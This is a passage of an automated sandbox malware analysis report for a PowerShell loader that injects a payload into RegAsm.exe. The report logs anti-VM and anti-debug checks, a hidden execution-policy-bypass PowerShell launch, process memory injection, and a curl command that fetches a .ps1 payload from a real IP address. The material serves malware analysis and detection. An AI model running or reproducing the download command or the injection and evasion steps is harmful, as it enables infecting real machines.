            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR
            Source: Yara matchFile source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2F50000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B980F6D sldt word ptr [eax]4_2_00007FFD9B980F6D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4181Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4590Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6425Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3226Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2538Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7266Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep count: 6425 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep count: 3226 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -14757395258967632s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8020Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8052Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
            Source: curl.exe, 00000005.00000003.1697656938.000002870BD94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll??'
            Source: RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxAAntiAnalysis : Hosting detected!AAntiAnalysis : Process detected!QAntiAnalysis : Virtual machine detected!AAntiAnalysis : SandBox detected!CAntiAnalysis : Debugger detected!
            Source: powershell.exe, 00000000.00000002.1724072618.00000201724BD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4129101776.0000000001347000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4146688512.00000000054E9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4146688512.00000000054CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VirtualMachine:
            Source: powershell.exe, 00000004.00000002.1883771714.00000277C555D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\Desktop\trwsfg.ps1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\Desktop\trwsfg.ps1\
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\Desktop\trwsfg.ps1:Zone.Identifier
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR
            Source: 4.2.powershell.exe.277af06a9f0.1.raw.unpack, ClasserPlus.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
            Source: 4.2.powershell.exe.277af06a9f0.1.raw.unpack, ClasserPlus.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
            Source: 4.2.powershell.exe.277af06a9f0.1.raw.unpack, ClasserPlus.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.0.csJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 700000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 702000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D79008Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1 Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1 Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3454.tmp" "c:\Users\user\AppData\Local\Temp\03bjtjx4\CSCBF3C1B7A512F4AE098C09161EC8504E.TMP"Jump to behavior
            Source: RegAsm.exe, 00000008.00000002.4131974339.00000000033AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4131974339.0000000003351000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4131974339.00000000032B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\^q
            Source: RegAsm.exe, 00000008.00000002.4131974339.00000000033AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4131974339.0000000003351000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4131974339.00000000032B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ProgMan
            Source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd!SHELLDLL_DefView
            Source: RegAsm.exe, 00000008.00000002.4131974339.000000000322F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\^qPaste_bin@\^q
            Source: RegAsm.exe, 00000008.00000002.4131974339.00000000033AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4131974339.0000000003351000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4131974339.00000000032B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`,^q
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
